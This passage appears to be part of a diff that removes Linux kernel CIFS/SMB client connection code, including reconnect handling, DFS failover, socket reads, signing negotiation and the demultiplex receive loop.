+-	cifs_dbg(FYI, "%s: tearing down socket\n", __func__);
+-	cifs_server_lock(server);
+-	if (server->ssocket) {
+-		cifs_dbg(FYI, "State: 0x%x Flags: 0x%lx\n", server->ssocket->state,
+-			 server->ssocket->flags);
+-		kernel_sock_shutdown(server->ssocket, SHUT_WR);
+-		cifs_dbg(FYI, "Post shutdown state: 0x%x Flags: 0x%lx\n", server->ssocket->state,
+-			 server->ssocket->flags);
+-		sock_release(server->ssocket);
+-		server->ssocket = NULL;
+-	}
+-	server->sequence_number = 0;
+-	server->session_estab = false;
+-	kfree_sensitive(server->session_key.response);
+-	server->session_key.response = NULL;
+-	server->session_key.len = 0;
+-	server->lstrp = jiffies;
+-
+-	/* mark submitted MIDs for retry and issue callback */
+-	INIT_LIST_HEAD(&retry_list);
+-	cifs_dbg(FYI, "%s: moving mids to private list\n", __func__);
+-	spin_lock(&server->mid_lock);
+-	list_for_each_entry_safe(mid, nmid, &server->pending_mid_q, qhead) {
+-		kref_get(&mid->refcount);
+-		if (mid->mid_state == MID_REQUEST_SUBMITTED)
+-			mid->mid_state = MID_RETRY_NEEDED;
+-		list_move(&mid->qhead, &retry_list);
+-		mid->mid_flags |= MID_DELETED;
+-	}
+-	spin_unlock(&server->mid_lock);
+-	cifs_server_unlock(server);
+-
+-	cifs_dbg(FYI, "%s: issuing mid callbacks\n", __func__);
+-	list_for_each_entry_safe(mid, nmid, &retry_list, qhead) {
+-		list_del_init(&mid->qhead);
+-		mid->callback(mid);
+-		release_mid(mid);
+-	}
+-
+-	if (cifs_rdma_enabled(server)) {
+-		cifs_server_lock(server);
+-		smbd_destroy(server);
+-		cifs_server_unlock(server);
+-	}
+-}
+-
+-static bool cifs_tcp_ses_needs_reconnect(struct TCP_Server_Info *server, int num_targets)
+-{
+-	spin_lock(&server->srv_lock);
+-	server->nr_targets = num_targets;
+-	if (server->tcpStatus == CifsExiting) {
+-		/* the demux thread will exit normally next time through the loop */
+-		spin_unlock(&server->srv_lock);
+-		wake_up(&server->response_q);
+-		return false;
+-	}
+-
+-	cifs_dbg(FYI, "Mark tcp session as need reconnect\n");
+-	trace_smb3_reconnect(server->CurrentMid, server->conn_id,
+-			     server->hostname);
+-	server->tcpStatus = CifsNeedReconnect;
+-
+-	spin_unlock(&server->srv_lock);
+-	return true;
+-}
+-
+-/*
+- * cifs tcp session reconnection
+- *
+- * mark tcp session as reconnecting so temporarily locked
+- * mark all smb sessions as reconnecting for tcp session
+- * reconnect tcp session
+- * wake up waiters on reconnection? - (not needed currently)
+- *
+- * if mark_smb_session is passed as true, unconditionally mark
+- * the smb session (and tcon) for reconnect as well. This value
+- * doesn't really matter for non-multichannel scenario.
+- *
+- */
+-static int __cifs_reconnect(struct TCP_Server_Info *server,
+-			    bool mark_smb_session)
+-{
+-	int rc = 0;
+-
+-	if (!cifs_tcp_ses_needs_reconnect(server, 1))
+-		return 0;
+-
+-	cifs_mark_tcp_ses_conns_for_reconnect(server, mark_smb_session);
+-
+-	cifs_abort_connection(server);
+-
+-	do {
+-		try_to_freeze();
+-		cifs_server_lock(server);
+-
+-		if (!cifs_swn_set_server_dstaddr(server)) {
+-			/* resolve the hostname again to make sure that IP address is up-to-date */
+-			rc = reconn_set_ipaddr_from_hostname(server);
+-			cifs_dbg(FYI, "%s: reconn_set_ipaddr_from_hostname: rc=%d\n", __func__, rc);
+-		}
+-
+-		if (cifs_rdma_enabled(server))
+-			rc = smbd_reconnect(server);
+-		else
+-			rc = generic_ip_connect(server);
+-		if (rc) {
+-			cifs_server_unlock(server);
+-			cifs_dbg(FYI, "%s: reconnect error %d\n", __func__, rc);
+-			msleep(3000);
+-		} else {
+-			atomic_inc(&tcpSesReconnectCount);
+-			set_credits(server, 1);
+-			spin_lock(&server->srv_lock);
+-			if (server->tcpStatus != CifsExiting)
+-				server->tcpStatus = CifsNeedNegotiate;
+-			spin_unlock(&server->srv_lock);
+-			cifs_swn_reset_server_dstaddr(server);
+-			cifs_server_unlock(server);
+-			mod_delayed_work(cifsiod_wq, &server->reconnect, 0);
+-		}
+-	} while (server->tcpStatus == CifsNeedReconnect);
+-
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus == CifsNeedNegotiate)
+-		mod_delayed_work(cifsiod_wq, &server->echo, 0);
+-	spin_unlock(&server->srv_lock);
+-
+-	wake_up(&server->response_q);
+-	return rc;
+-}
+-
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-static int __reconnect_target_unlocked(struct TCP_Server_Info *server, const char *target)
+-{
+-	int rc;
+-	char *hostname;
+-
+-	if (!cifs_swn_set_server_dstaddr(server)) {
+-		if (server->hostname != target) {
+-			hostname = extract_hostname(target);
+-			if (!IS_ERR(hostname)) {
+-				spin_lock(&server->srv_lock);
+-				kfree(server->hostname);
+-				server->hostname = hostname;
+-				spin_unlock(&server->srv_lock);
+-			} else {
+-				cifs_dbg(FYI, "%s: couldn't extract hostname or address from dfs target: %ld\n",
+-					 __func__, PTR_ERR(hostname));
+-				cifs_dbg(FYI, "%s: default to last target server: %s\n", __func__,
+-					 server->hostname);
+-			}
+-		}
+-		/* resolve the hostname again to make sure that IP address is up-to-date. */
+-		rc = reconn_set_ipaddr_from_hostname(server);
+-		cifs_dbg(FYI, "%s: reconn_set_ipaddr_from_hostname: rc=%d\n", __func__, rc);
+-	}
+-	/* Reconnect the socket */
+-	if (cifs_rdma_enabled(server))
+-		rc = smbd_reconnect(server);
+-	else
+-		rc = generic_ip_connect(server);
+-
+-	return rc;
+-}
+-
+-static int reconnect_target_unlocked(struct TCP_Server_Info *server, struct dfs_cache_tgt_list *tl,
+-				     struct dfs_cache_tgt_iterator **target_hint)
+-{
+-	int rc;
+-	struct dfs_cache_tgt_iterator *tit;
+-
+-	*target_hint = NULL;
+-
+-	/* If dfs target list is empty, then reconnect to last server */
+-	tit = dfs_cache_get_tgt_iterator(tl);
+-	if (!tit)
+-		return __reconnect_target_unlocked(server, server->hostname);
+-
+-	/* Otherwise, try every dfs target in @tl */
+-	for (; tit; tit = dfs_cache_get_next_tgt(tl, tit)) {
+-		rc = __reconnect_target_unlocked(server, dfs_cache_get_tgt_name(tit));
+-		if (!rc) {
+-			*target_hint = tit;
+-			break;
+-		}
+-	}
+-	return rc;
+-}
+-
+-static int reconnect_dfs_server(struct TCP_Server_Info *server)
+-{
+-	int rc = 0;
+-	const char *refpath = server->current_fullpath + 1;
+-	struct dfs_cache_tgt_list tl = DFS_CACHE_TGT_LIST_INIT(tl);
+-	struct dfs_cache_tgt_iterator *target_hint = NULL;
+-	int num_targets = 0;
+-
+-	/*
+-	 * Determine the number of dfs targets the referral path in @cifs_sb resolves to.
+-	 *
+-	 * smb2_reconnect() needs to know how long it should wait based upon the number of dfs
+-	 * targets (server->nr_targets).  It's also possible that the cached referral was cleared
+-	 * through /proc/fs/cifs/dfscache or the target list is empty due to server settings after
+-	 * refreshing the referral, so, in this case, default it to 1.
+-	 */
+-	if (!dfs_cache_noreq_find(refpath, NULL, &tl))
+-		num_targets = dfs_cache_get_nr_tgts(&tl);
+-	if (!num_targets)
+-		num_targets = 1;
+-
+-	if (!cifs_tcp_ses_needs_reconnect(server, num_targets))
+-		return 0;
+-
+-	/*
+-	 * Unconditionally mark all sessions & tcons for reconnect as we might be connecting to a
+-	 * different server or share during failover.  It could be improved by adding some logic to
+-	 * only do that in case it connects to a different server or share, though.
+-	 */
+-	cifs_mark_tcp_ses_conns_for_reconnect(server, true);
+-
+-	cifs_abort_connection(server);
+-
+-	do {
+-		try_to_freeze();
+-		cifs_server_lock(server);
+-
+-		rc = reconnect_target_unlocked(server, &tl, &target_hint);
+-		if (rc) {
+-			/* Failed to reconnect socket */
+-			cifs_server_unlock(server);
+-			cifs_dbg(FYI, "%s: reconnect error %d\n", __func__, rc);
+-			msleep(3000);
+-			continue;
+-		}
+-		/*
+-		 * Socket was created.  Update tcp session status to CifsNeedNegotiate so that a
+-		 * process waiting for reconnect will know it needs to re-establish session and tcon
+-		 * through the reconnected target server.
+-		 */
+-		atomic_inc(&tcpSesReconnectCount);
+-		set_credits(server, 1);
+-		spin_lock(&server->srv_lock);
+-		if (server->tcpStatus != CifsExiting)
+-			server->tcpStatus = CifsNeedNegotiate;
+-		spin_unlock(&server->srv_lock);
+-		cifs_swn_reset_server_dstaddr(server);
+-		cifs_server_unlock(server);
+-		mod_delayed_work(cifsiod_wq, &server->reconnect, 0);
+-	} while (server->tcpStatus == CifsNeedReconnect);
+-
+-	if (target_hint)
+-		dfs_cache_noreq_update_tgthint(refpath, target_hint);
+-
+-	dfs_cache_free_tgts(&tl);
+-
+-	/* Need to set up echo worker again once connection has been established */
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus == CifsNeedNegotiate)
+-		mod_delayed_work(cifsiod_wq, &server->echo, 0);
+-	spin_unlock(&server->srv_lock);
+-
+-	wake_up(&server->response_q);
+-	return rc;
+-}
+-
+-int cifs_reconnect(struct TCP_Server_Info *server, bool mark_smb_session)
+-{
+-	/* If tcp session is not an dfs connection, then reconnect to last target server */
+-	spin_lock(&server->srv_lock);
+-	if (!server->is_dfs_conn) {
+-		spin_unlock(&server->srv_lock);
+-		return __cifs_reconnect(server, mark_smb_session);
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-	mutex_lock(&server->refpath_lock);
+-	if (!server->origin_fullpath || !server->leaf_fullpath) {
+-		mutex_unlock(&server->refpath_lock);
+-		return __cifs_reconnect(server, mark_smb_session);
+-	}
+-	mutex_unlock(&server->refpath_lock);
+-
+-	return reconnect_dfs_server(server);
+-}
+-#else
+-int cifs_reconnect(struct TCP_Server_Info *server, bool mark_smb_session)
+-{
+-	return __cifs_reconnect(server, mark_smb_session);
+-}
+-#endif
+-
+-static void
+-cifs_echo_request(struct work_struct *work)
+-{
+-	int rc;
+-	struct TCP_Server_Info *server = container_of(work,
+-					struct TCP_Server_Info, echo.work);
+-
+-	/*
+-	 * We cannot send an echo if it is disabled.
+-	 * Also, no need to ping if we got a response recently.
+-	 */
+-
+-	if (server->tcpStatus == CifsNeedReconnect ||
+-	    server->tcpStatus == CifsExiting ||
+-	    server->tcpStatus == CifsNew ||
+-	    (server->ops->can_echo && !server->ops->can_echo(server)) ||
+-	    time_before(jiffies, server->lstrp + server->echo_interval - HZ))
+-		goto requeue_echo;
+-
+-	rc = server->ops->echo ? server->ops->echo(server) : -ENOSYS;
+-	cifs_server_dbg(FYI, "send echo request: rc = %d\n", rc);
+-
+-	/* Check witness registrations */
+-	cifs_swn_check();
+-
+-requeue_echo:
+-	queue_delayed_work(cifsiod_wq, &server->echo, server->echo_interval);
+-}
+-
+-static bool
+-allocate_buffers(struct TCP_Server_Info *server)
+-{
+-	if (!server->bigbuf) {
+-		server->bigbuf = (char *)cifs_buf_get();
+-		if (!server->bigbuf) {
+-			cifs_server_dbg(VFS, "No memory for large SMB response\n");
+-			msleep(3000);
+-			/* retry will check if exiting */
+-			return false;
+-		}
+-	} else if (server->large_buf) {
+-		/* we are reusing a dirty large buf, clear its start */
+-		memset(server->bigbuf, 0, HEADER_SIZE(server));
+-	}
+-
+-	if (!server->smallbuf) {
+-		server->smallbuf = (char *)cifs_small_buf_get();
+-		if (!server->smallbuf) {
+-			cifs_server_dbg(VFS, "No memory for SMB response\n");
+-			msleep(1000);
+-			/* retry will check if exiting */
+-			return false;
+-		}
+-		/* beginning of smb buffer is cleared in our buf_get */
+-	} else {
+-		/* if existing small buf clear beginning */
+-		memset(server->smallbuf, 0, HEADER_SIZE(server));
+-	}
+-
+-	return true;
+-}
+-
+-static bool
+-server_unresponsive(struct TCP_Server_Info *server)
+-{
+-	/*
+-	 * We need to wait 3 echo intervals to make sure we handle such
+-	 * situations right:
+-	 * 1s  client sends a normal SMB request
+-	 * 2s  client gets a response
+-	 * 30s echo workqueue job pops, and decides we got a response recently
+-	 *     and don't need to send another
+-	 * ...
+-	 * 65s kernel_recvmsg times out, and we see that we haven't gotten
+-	 *     a response in >60s.
+-	 */
+-	spin_lock(&server->srv_lock);
+-	if ((server->tcpStatus == CifsGood ||
+-	    server->tcpStatus == CifsNeedNegotiate) &&
+-	    (!server->ops->can_echo || server->ops->can_echo(server)) &&
+-	    time_after(jiffies, server->lstrp + 3 * server->echo_interval)) {
+-		spin_unlock(&server->srv_lock);
+-		cifs_server_dbg(VFS, "has not responded in %lu seconds. Reconnecting...\n",
+-			 (3 * server->echo_interval) / HZ);
+-		cifs_reconnect(server, false);
+-		return true;
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-	return false;
+-}
+-
+-static inline bool
+-zero_credits(struct TCP_Server_Info *server)
+-{
+-	int val;
+-
+-	spin_lock(&server->req_lock);
+-	val = server->credits + server->echo_credits + server->oplock_credits;
+-	if (server->in_flight == 0 && val == 0) {
+-		spin_unlock(&server->req_lock);
+-		return true;
+-	}
+-	spin_unlock(&server->req_lock);
+-	return false;
+-}
+-
+-static int
+-cifs_readv_from_socket(struct TCP_Server_Info *server, struct msghdr *smb_msg)
+-{
+-	int length = 0;
+-	int total_read;
+-
+-	for (total_read = 0; msg_data_left(smb_msg); total_read += length) {
+-		try_to_freeze();
+-
+-		/* reconnect if no credits and no requests in flight */
+-		if (zero_credits(server)) {
+-			cifs_reconnect(server, false);
+-			return -ECONNABORTED;
+-		}
+-
+-		if (server_unresponsive(server))
+-			return -ECONNABORTED;
+-		if (cifs_rdma_enabled(server) && server->smbd_conn)
+-			length = smbd_recv(server->smbd_conn, smb_msg);
+-		else
+-			length = sock_recvmsg(server->ssocket, smb_msg, 0);
+-
+-		spin_lock(&server->srv_lock);
+-		if (server->tcpStatus == CifsExiting) {
+-			spin_unlock(&server->srv_lock);
+-			return -ESHUTDOWN;
+-		}
+-
+-		if (server->tcpStatus == CifsNeedReconnect) {
+-			spin_unlock(&server->srv_lock);
+-			cifs_reconnect(server, false);
+-			return -ECONNABORTED;
+-		}
+-		spin_unlock(&server->srv_lock);
+-
+-		if (length == -ERESTARTSYS ||
+-		    length == -EAGAIN ||
+-		    length == -EINTR) {
+-			/*
+-			 * Minimum sleep to prevent looping, allowing socket
+-			 * to clear and app threads to set tcpStatus
+-			 * CifsNeedReconnect if server hung.
+-			 */
+-			usleep_range(1000, 2000);
+-			length = 0;
+-			continue;
+-		}
+-
+-		if (length <= 0) {
+-			cifs_dbg(FYI, "Received no data or error: %d\n", length);
+-			cifs_reconnect(server, false);
+-			return -ECONNABORTED;
+-		}
+-	}
+-	return total_read;
+-}
+-
+-int
+-cifs_read_from_socket(struct TCP_Server_Info *server, char *buf,
+-		      unsigned int to_read)
+-{
+-	struct msghdr smb_msg = {};
+-	struct kvec iov = {.iov_base = buf, .iov_len = to_read};
+-	iov_iter_kvec(&smb_msg.msg_iter, ITER_DEST, &iov, 1, to_read);
+-
+-	return cifs_readv_from_socket(server, &smb_msg);
+-}
+-
+-ssize_t
+-cifs_discard_from_socket(struct TCP_Server_Info *server, size_t to_read)
+-{
+-	struct msghdr smb_msg = {};
+-
+-	/*
+-	 *  iov_iter_discard already sets smb_msg.type and count and iov_offset
+-	 *  and cifs_readv_from_socket sets msg_control and msg_controllen
+-	 *  so little to initialize in struct msghdr
+-	 */
+-	iov_iter_discard(&smb_msg.msg_iter, ITER_DEST, to_read);
+-
+-	return cifs_readv_from_socket(server, &smb_msg);
+-}
+-
+-int
+-cifs_read_page_from_socket(struct TCP_Server_Info *server, struct page *page,
+-	unsigned int page_offset, unsigned int to_read)
+-{
+-	struct msghdr smb_msg = {};
+-	struct bio_vec bv = {
+-		.bv_page = page, .bv_len = to_read, .bv_offset = page_offset};
+-	iov_iter_bvec(&smb_msg.msg_iter, ITER_DEST, &bv, 1, to_read);
+-	return cifs_readv_from_socket(server, &smb_msg);
+-}
+-
+-static bool
+-is_smb_response(struct TCP_Server_Info *server, unsigned char type)
+-{
+-	/*
+-	 * The first byte big endian of the length field,
+-	 * is actually not part of the length but the type
+-	 * with the most common, zero, as regular data.
+-	 */
+-	switch (type) {
+-	case RFC1002_SESSION_MESSAGE:
+-		/* Regular SMB response */
+-		return true;
+-	case RFC1002_SESSION_KEEP_ALIVE:
+-		cifs_dbg(FYI, "RFC 1002 session keep alive\n");
+-		break;
+-	case RFC1002_POSITIVE_SESSION_RESPONSE:
+-		cifs_dbg(FYI, "RFC 1002 positive session response\n");
+-		break;
+-	case RFC1002_NEGATIVE_SESSION_RESPONSE:
+-		/*
+-		 * We get this from Windows 98 instead of an error on
+-		 * SMB negprot response.
+-		 */
+-		cifs_dbg(FYI, "RFC 1002 negative session response\n");
+-		/* give server a second to clean up */
+-		msleep(1000);
+-		/*
+-		 * Always try 445 first on reconnect since we get NACK
+-		 * on some if we ever connected to port 139 (the NACK
+-		 * is since we do not begin with RFC1001 session
+-		 * initialize frame).
+-		 */
+-		cifs_set_port((struct sockaddr *)&server->dstaddr, CIFS_PORT);
+-		cifs_reconnect(server, true);
+-		break;
+-	default:
+-		cifs_server_dbg(VFS, "RFC 1002 unknown response type 0x%x\n", type);
+-		cifs_reconnect(server, true);
+-	}
+-
+-	return false;
+-}
+-
+-void
+-dequeue_mid(struct mid_q_entry *mid, bool malformed)
+-{
+-#ifdef CONFIG_CIFS_STATS2
+-	mid->when_received = jiffies;
+-#endif
+-	spin_lock(&mid->server->mid_lock);
+-	if (!malformed)
+-		mid->mid_state = MID_RESPONSE_RECEIVED;
+-	else
+-		mid->mid_state = MID_RESPONSE_MALFORMED;
+-	/*
+-	 * Trying to handle/dequeue a mid after the send_recv()
+-	 * function has finished processing it is a bug.
+-	 */
+-	if (mid->mid_flags & MID_DELETED) {
+-		spin_unlock(&mid->server->mid_lock);
+-		pr_warn_once("trying to dequeue a deleted mid\n");
+-	} else {
+-		list_del_init(&mid->qhead);
+-		mid->mid_flags |= MID_DELETED;
+-		spin_unlock(&mid->server->mid_lock);
+-	}
+-}
+-
+-static unsigned int
+-smb2_get_credits_from_hdr(char *buffer, struct TCP_Server_Info *server)
+-{
+-	struct smb2_hdr *shdr = (struct smb2_hdr *)buffer;
+-
+-	/*
+-	 * SMB1 does not use credits.
+-	 */
+-	if (is_smb1(server))
+-		return 0;
+-
+-	return le16_to_cpu(shdr->CreditRequest);
+-}
+-
+-static void
+-handle_mid(struct mid_q_entry *mid, struct TCP_Server_Info *server,
+-	   char *buf, int malformed)
+-{
+-	if (server->ops->check_trans2 &&
+-	    server->ops->check_trans2(mid, server, buf, malformed))
+-		return;
+-	mid->credits_received = smb2_get_credits_from_hdr(buf, server);
+-	mid->resp_buf = buf;
+-	mid->large_buf = server->large_buf;
+-	/* Was previous buf put in mpx struct for multi-rsp? */
+-	if (!mid->multiRsp) {
+-		/* smb buffer will be freed by user thread */
+-		if (server->large_buf)
+-			server->bigbuf = NULL;
+-		else
+-			server->smallbuf = NULL;
+-	}
+-	dequeue_mid(mid, malformed);
+-}
+-
+-int
+-cifs_enable_signing(struct TCP_Server_Info *server, bool mnt_sign_required)
+-{
+-	bool srv_sign_required = server->sec_mode & server->vals->signing_required;
+-	bool srv_sign_enabled = server->sec_mode & server->vals->signing_enabled;
+-	bool mnt_sign_enabled;
+-
+-	/*
+-	 * Is signing required by mnt options? If not then check
+-	 * global_secflags to see if it is there.
+-	 */
+-	if (!mnt_sign_required)
+-		mnt_sign_required = ((global_secflags & CIFSSEC_MUST_SIGN) ==
+-						CIFSSEC_MUST_SIGN);
+-
+-	/*
+-	 * If signing is required then it's automatically enabled too,
+-	 * otherwise, check to see if the secflags allow it.
+-	 */
+-	mnt_sign_enabled = mnt_sign_required ? mnt_sign_required :
+-				(global_secflags & CIFSSEC_MAY_SIGN);
+-
+-	/* If server requires signing, does client allow it? */
+-	if (srv_sign_required) {
+-		if (!mnt_sign_enabled) {
+-			cifs_dbg(VFS, "Server requires signing, but it's disabled in SecurityFlags!\n");
+-			return -EOPNOTSUPP;
+-		}
+-		server->sign = true;
+-	}
+-
+-	/* If client requires signing, does server allow it? */
+-	if (mnt_sign_required) {
+-		if (!srv_sign_enabled) {
+-			cifs_dbg(VFS, "Server does not support signing!\n");
+-			return -EOPNOTSUPP;
+-		}
+-		server->sign = true;
+-	}
+-
+-	if (cifs_rdma_enabled(server) && server->sign)
+-		cifs_dbg(VFS, "Signing is enabled, and RDMA read/write will be disabled\n");
+-
+-	return 0;
+-}
+-
+-
+-static void clean_demultiplex_info(struct TCP_Server_Info *server)
+-{
+-	int length;
+-
+-	/* take it off the list, if it's not already */
+-	spin_lock(&server->srv_lock);
+-	list_del_init(&server->tcp_ses_list);
+-	spin_unlock(&server->srv_lock);
+-
+-	cancel_delayed_work_sync(&server->echo);
+-	cancel_delayed_work_sync(&server->resolve);
+-
+-	spin_lock(&server->srv_lock);
+-	server->tcpStatus = CifsExiting;
+-	spin_unlock(&server->srv_lock);
+-	wake_up_all(&server->response_q);
+-
+-	/* check if we have blocked requests that need to free */
+-	spin_lock(&server->req_lock);
+-	if (server->credits <= 0)
+-		server->credits = 1;
+-	spin_unlock(&server->req_lock);
+-	/*
+-	 * Although there should not be any requests blocked on this queue it
+-	 * can not hurt to be paranoid and try to wake up requests that may
+-	 * haven been blocked when more than 50 at time were on the wire to the
+-	 * same server - they now will see the session is in exit state and get
+-	 * out of SendReceive.
+-	 */
+-	wake_up_all(&server->request_q);
+-	/* give those requests time to exit */
+-	msleep(125);
+-	if (cifs_rdma_enabled(server))
+-		smbd_destroy(server);
+-	if (server->ssocket) {
+-		sock_release(server->ssocket);
+-		server->ssocket = NULL;
+-	}
+-
+-	if (!list_empty(&server->pending_mid_q)) {
+-		struct list_head dispose_list;
+-		struct mid_q_entry *mid_entry;
+-		struct list_head *tmp, *tmp2;
+-
+-		INIT_LIST_HEAD(&dispose_list);
+-		spin_lock(&server->mid_lock);
+-		list_for_each_safe(tmp, tmp2, &server->pending_mid_q) {
+-			mid_entry = list_entry(tmp, struct mid_q_entry, qhead);
+-			cifs_dbg(FYI, "Clearing mid %llu\n", mid_entry->mid);
+-			kref_get(&mid_entry->refcount);
+-			mid_entry->mid_state = MID_SHUTDOWN;
+-			list_move(&mid_entry->qhead, &dispose_list);
+-			mid_entry->mid_flags |= MID_DELETED;
+-		}
+-		spin_unlock(&server->mid_lock);
+-
+-		/* now walk dispose list and issue callbacks */
+-		list_for_each_safe(tmp, tmp2, &dispose_list) {
+-			mid_entry = list_entry(tmp, struct mid_q_entry, qhead);
+-			cifs_dbg(FYI, "Callback mid %llu\n", mid_entry->mid);
+-			list_del_init(&mid_entry->qhead);
+-			mid_entry->callback(mid_entry);
+-			release_mid(mid_entry);
+-		}
+-		/* 1/8th of sec is more than enough time for them to exit */
+-		msleep(125);
+-	}
+-
+-	if (!list_empty(&server->pending_mid_q)) {
+-		/*
+-		 * mpx threads have not exited yet give them at least the smb
+-		 * send timeout time for long ops.
+-		 *
+-		 * Due to delays on oplock break requests, we need to wait at
+-		 * least 45 seconds before giving up on a request getting a
+-		 * response and going ahead and killing cifsd.
+-		 */
+-		cifs_dbg(FYI, "Wait for exit from demultiplex thread\n");
+-		msleep(46000);
+-		/*
+-		 * If threads still have not exited they are probably never
+-		 * coming home not much else we can do but free the memory.
+-		 */
+-	}
+-
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	kfree(server->origin_fullpath);
+-	kfree(server->leaf_fullpath);
+-#endif
+-	kfree(server);
+-
+-	length = atomic_dec_return(&tcpSesAllocCount);
+-	if (length > 0)
+-		mempool_resize(cifs_req_poolp, length + cifs_min_rcv);
+-}
+-
+-static int
+-standard_receive3(struct TCP_Server_Info *server, struct mid_q_entry *mid)
+-{
+-	int length;
+-	char *buf = server->smallbuf;
+-	unsigned int pdu_length = server->pdu_size;
+-
+-	/* make sure this will fit in a large buffer */
+-	if (pdu_length > CIFSMaxBufSize + MAX_HEADER_SIZE(server) -
+-	    HEADER_PREAMBLE_SIZE(server)) {
+-		cifs_server_dbg(VFS, "SMB response too long (%u bytes)\n", pdu_length);
+-		cifs_reconnect(server, true);
+-		return -ECONNABORTED;
+-	}
+-
+-	/* switch to large buffer if too big for a small one */
+-	if (pdu_length > MAX_CIFS_SMALL_BUFFER_SIZE - 4) {
+-		server->large_buf = true;
+-		memcpy(server->bigbuf, buf, server->total_read);
+-		buf = server->bigbuf;
+-	}
+-
+-	/* now read the rest */
+-	length = cifs_read_from_socket(server, buf + HEADER_SIZE(server) - 1,
+-				       pdu_length - MID_HEADER_SIZE(server));
+-
+-	if (length < 0)
+-		return length;
+-	server->total_read += length;
+-
+-	dump_smb(buf, server->total_read);
+-
+-	return cifs_handle_standard(server, mid);
+-}
+-
+-int
+-cifs_handle_standard(struct TCP_Server_Info *server, struct mid_q_entry *mid)
+-{
+-	char *buf = server->large_buf ? server->bigbuf : server->smallbuf;
+-	int rc;
+-
+-	/*
+-	 * We know that we received enough to get to the MID as we
+-	 * checked the pdu_length earlier. Now check to see
+-	 * if the rest of the header is OK.
+-	 *
+-	 * 48 bytes is enough to display the header and a little bit
+-	 * into the payload for debugging purposes.
+-	 */
+-	rc = server->ops->check_message(buf, server->total_read, server);
+-	if (rc)
+-		cifs_dump_mem("Bad SMB: ", buf,
+-			min_t(unsigned int, server->total_read, 48));
+-
+-	if (server->ops->is_session_expired &&
+-	    server->ops->is_session_expired(buf)) {
+-		cifs_reconnect(server, true);
+-		return -1;
+-	}
+-
+-	if (server->ops->is_status_pending &&
+-	    server->ops->is_status_pending(buf, server))
+-		return -1;
+-
+-	if (!mid)
+-		return rc;
+-
+-	handle_mid(mid, server, buf, rc);
+-	return 0;
+-}
+-
+-static void
+-smb2_add_credits_from_hdr(char *buffer, struct TCP_Server_Info *server)
+-{
+-	struct smb2_hdr *shdr = (struct smb2_hdr *)buffer;
+-	int scredits, in_flight;
+-
+-	/*
+-	 * SMB1 does not use credits.
+-	 */
+-	if (is_smb1(server))
+-		return;
+-
+-	if (shdr->CreditRequest) {
+-		spin_lock(&server->req_lock);
+-		server->credits += le16_to_cpu(shdr->CreditRequest);
+-		scredits = server->credits;
+-		in_flight = server->in_flight;
+-		spin_unlock(&server->req_lock);
+-		wake_up(&server->request_q);
+-
+-		trace_smb3_hdr_credits(server->CurrentMid,
+-				server->conn_id, server->hostname, scredits,
+-				le16_to_cpu(shdr->CreditRequest), in_flight);
+-		cifs_server_dbg(FYI, "%s: added %u credits total=%d\n",
+-				__func__, le16_to_cpu(shdr->CreditRequest),
+-				scredits);
+-	}
+-}
+-
+-
+-static int
+-cifs_demultiplex_thread(void *p)
+-{
+-	int i, num_mids, length;
+-	struct TCP_Server_Info *server = p;
+-	unsigned int pdu_length;
+-	unsigned int next_offset;
+-	char *buf = NULL;
+-	struct task_struct *task_to_wake = NULL;
+-	struct mid_q_entry *mids[MAX_COMPOUND];
+-	char *bufs[MAX_COMPOUND];
+-	unsigned int noreclaim_flag, num_io_timeout = 0;
+-
+-	noreclaim_flag = memalloc_noreclaim_save();
+-	cifs_dbg(FYI, "Demultiplex PID: %d\n", task_pid_nr(current));
+-
+-	length = atomic_inc_return(&tcpSesAllocCount);
+-	if (length > 1)
+-		mempool_resize(cifs_req_poolp, length + cifs_min_rcv);
+-
+-	set_freezable();
+-	allow_kernel_signal(SIGKILL);
+-	while (server->tcpStatus != CifsExiting) {
+-		if (try_to_freeze())
+-			continue;
+-
+-		if (!allocate_buffers(server))
+-			continue;
+-
+-		server->large_buf = false;
+-		buf = server->smallbuf;
+-		pdu_length = 4; /* enough to get RFC1001 header */
+-
+-		length = cifs_read_from_socket(server, buf, pdu_length);
+-		if (length < 0)
+-			continue;
+-
+-		if (is_smb1(server))
+-			server->total_read = length;
+-		else
+-			server->total_read = 0;
+-
+-		/*
+-		 * The right amount was read from socket - 4 bytes,
+-		 * so we can now interpret the length field.
+-		 */
+-		pdu_length = get_rfc1002_length(buf);
+-
+-		cifs_dbg(FYI, "RFC1002 header 0x%x\n", pdu_length);
+-		if (!is_smb_response(server, buf[0]))
+-			continue;
+-next_pdu:
+-		server->pdu_size = pdu_length;
+-
+-		/* make sure we have enough to get to the MID */
+-		if (server->pdu_size < MID_HEADER_SIZE(server)) {
+-			cifs_server_dbg(VFS, "SMB response too short (%u bytes)\n",
+-				 server->pdu_size);
+-			cifs_reconnect(server, true);
+-			continue;
+-		}
+-
+-		/* read down to the MID */
+-		length = cifs_read_from_socket(server,
+-			     buf + HEADER_PREAMBLE_SIZE(server),
+-			     MID_HEADER_SIZE(server));
+-		if (length < 0)
+-			continue;
+-		server->total_read += length;
+-
+-		if (server->ops->next_header) {
+-			next_offset = server->ops->next_header(buf);
+-			if (next_offset)
+-				server->pdu_size = next_offset;
+-		}
+-
+-		memset(mids, 0, sizeof(mids));
+-		memset(bufs, 0, sizeof(bufs));
+-		num_mids = 0;
+-
+-		if (server->ops->is_transform_hdr &&
+-		    server->ops->receive_transform &&
+-		    server->ops->is_transform_hdr(buf)) {
+-			length = server->ops->receive_transform(server,
+-								mids,
+-								bufs,
+-								&num_mids);
+-		} else {
+-			mids[0] = server->ops->find_mid(server, buf);
+-			bufs[0] = buf;
+-			num_mids = 1;
+-
+-			if (!mids[0] || !mids[0]->receive)
+-				length = standard_receive3(server, mids[0]);
+-			else
+-				length = mids[0]->receive(server, mids[0]);
+-		}
+-
+-		if (length < 0) {
+-			for (i = 0; i < num_mids; i++)
+-				if (mids[i])
+-					release_mid(mids[i]);
+-			continue;
+-		}
+-
+-		if (server->ops->is_status_io_timeout &&
+-		    server->ops->is_status_io_timeout(buf)) {
+-			num_io_timeout++;
+-			if (num_io_timeout > NUM_STATUS_IO_TIMEOUT) {
+-				cifs_reconnect(server, false);
+-				num_io_timeout = 0;
+-				continue;
+-			}
+-		}
+-
+-		server->lstrp = jiffies;
+-
+-		for (i = 0; i < num_mids; i++) {
